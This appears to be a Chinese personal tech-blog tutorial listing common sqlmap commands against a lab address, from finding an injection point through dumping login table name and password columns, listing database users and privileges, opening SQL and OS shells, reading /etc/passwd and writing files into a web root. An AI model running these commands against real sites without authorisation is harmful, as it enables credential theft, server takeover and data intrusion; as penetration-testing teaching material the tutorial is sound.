1379天 Edwiin

本人熟练掌握linux,windows的开关机,擅长nfs,samba,ftp,dhcp,bind,apache,mail等各项服务的安装与卸载,精通shell,mysql,iptables,selinux等单词的拼写,了解虚拟化,存储,集群等相关汉字的书写。

Sqlmap注入教程-3篇常见SQLMAP使用方法(必备命令)

发布于 5天前 / 172 次围观 / 0 条评论 / 技术学习 / Edwiin

      Sqlmap是一个专业的SQL注入工具,用法也很多,具体可以用"sqlmap -hh"查看完整的命令帮助文档,我这只是给大家分享一些最常用的Sqlmap用法。

博主是使用的之前发过的免Python环境的sqlmap:https://www.edwiin.cn/post-137.html,本文均在windows环境下运行成功。

一、Sqlmap注入篇

1、检查注入点

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11

2、爆所有数据库信息

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --dbs

爆当前数据库信息

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --current-db

3、列出指定数据库所有的表名

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 -D edwiin --tables

'edwiin' 为指定数据库名称

4、列出指定表名的所有列名

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 -D edwiin -T tlogin --columns

'tlogin' 为指定表名称

5、dump打印输出表名指定列名字段的值数据

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 -D edwiin -T tlogin -C name,password --dump

'name,password' 为指定字段名称

二、Sqlmap用户权限篇

1、列出数据库管理系统用户:

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --users

查看当前连接数据库用户:

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --current-user

2、判断当前用户是否是DBA?

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --is-dba

3、查看用户权限:

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --privileges
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --privileges -U edwiin

三、Sqlmap文件操作与shell提权篇

1、sql shell

这里通过sqlmap可以直接获取一个sql shell,直接执行sql语句进行交互。

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --sql-shell
sql-shell> select version();

注意:这里由于进入了sql shell可以执行sql语句了,也可以用 load data infile、load_file、into outfile等函数来进行文件读取或写入;

2、cmd shell

这里通过sqlmap可以直接获取一个cmd shell,直接执行cmd命令进行交互。

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --os-shell
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --os-cmd=ipconfig

3、读取服务器上指定文件

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --file-read=/etc/passwd
[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --file-read=d:/test.txt

4、写入本地文件到服务器上

[root@Hacker~]# Sqlmap -u http://192.168.1.145/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt